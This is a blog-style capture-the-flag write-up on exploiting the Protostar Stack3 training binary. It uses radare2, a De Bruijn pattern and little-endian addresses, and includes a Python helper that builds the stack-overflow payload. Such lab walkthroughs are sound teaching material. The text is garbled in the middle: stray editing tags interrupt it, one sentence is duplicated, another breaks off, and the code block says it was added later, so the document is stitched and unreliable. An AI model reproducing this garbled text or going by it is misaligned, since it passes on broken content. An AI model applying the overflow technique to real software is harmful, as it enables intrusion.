2017, Dec 18

# Exploiting Protostar Stack3

You can check the previous problems here:

## Problem source code

We will work through this problem as if we do not have the C source code.

As you can clearly see, our binary is a 32-bit ELF file, not stripped, and it is not protected with canaries, PIC, NX or RELRO.

## Let's have a look at what's happening inside the app

We will start the app inside Radare2 and have a look in Visual Mode to try to understand how it works.

So this is the key line, je 0x8048477, and our main **Goal** is to overwrite local_5ch (esp+0x5c) with 0x8048477.

Now we'll use a tool from the radare framework called ragg2, which lets us generate a cyclic pattern (a De Bruijn sequence) and find the exact offset at which our payload overflows the buffer.

In visual mode you can step through the program with S until you reach the line just before cmp dword [local_5ch], 0.

Now let's create a new payload with the right value for local_5ch.

Look at the line call eax: we want the offset of eax so that the second jump succeeds. Step through until you reach this line, then
</gre_replace>
<gr_replace lines="27" cat="clarify" orig="Also we want">
We also want to know the address of the 'win' function.

Also we want to know the address of ‘win’ function

Now we know that we want to put 0x08048424 in eax.

Let's rewrite our payload and exploit the binary. Notice that we are working with little-endian byte order, so 0x8048477 becomes \x77\x84\x04\x08 (reversed) and 0x08048424 becomes \x24\x84\x04\x08.
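The three steps above (generate a cyclic pattern, recover the offset from the value that landed in local_5ch or eax, then lay out the little-endian addresses) as an added Python example; this is not code from the original post, and the offsets 64 and 68 used in the assertions are constructed placeholders, not the ones the author read out of radare2.

```python
import struct

FP_VALUE = 0x8048477   # value the post writes over local_5ch / esp+0x5c
WIN_ADDR = 0x08048424  # address of win() from the post

def de_bruijn(alphabet: bytes, n: int, length: int) -> bytes:
    # First `length` bytes of a De Bruijn sequence (every n-byte window unique),
    # built with the classic FKM recursion; this is what ragg2 -P generates.
    k, a, seq = len(alphabet), [0] * (len(alphabet) * n), []

    def db(t: int, p: int) -> None:
        if len(seq) >= length:   # enough pattern, stop recursing
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])

def reg_value(chunk: bytes) -> int:
    # 4 pattern bytes read back as the 32-bit value a register or stack slot shows
    return struct.unpack("<I", chunk)[0]

def pattern_offset(pattern: bytes, value: int) -> int:
    # Offset of the 4 pattern bytes that landed in local_5ch / eax as `value`
    idx = pattern.find(struct.pack("<I", value))
    if idx < 0:
        raise ValueError("value not found in pattern")
    return idx

def le32(addr: int) -> bytes:
    # Little-endian encoding: 0x8048477 -> b"\x77\x84\x04\x08"
    return struct.pack("<I", addr)

def build_payload(writes: dict) -> bytes:
    # Place 32-bit values at the given offsets, padding the gaps with 'A'
    # (offsets are whatever radare2 showed for local_5ch and eax, not hard-coded here)
    out = bytearray()
    for off in sorted(writes):
        if off < len(out):
            raise ValueError(f"overlapping write at offset {off}")
        out += b"A" * (off - len(out)) + le32(writes[off])
    return bytes(out)
```

Feed `de_bruijn(...)` to the binary first, plug the value radare2 shows in local_5ch or eax into `pattern_offset`, then build the final input with `build_payload({offset_fp: FP_VALUE, offset_eax: WIN_ADDR})`.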

And we did it ;)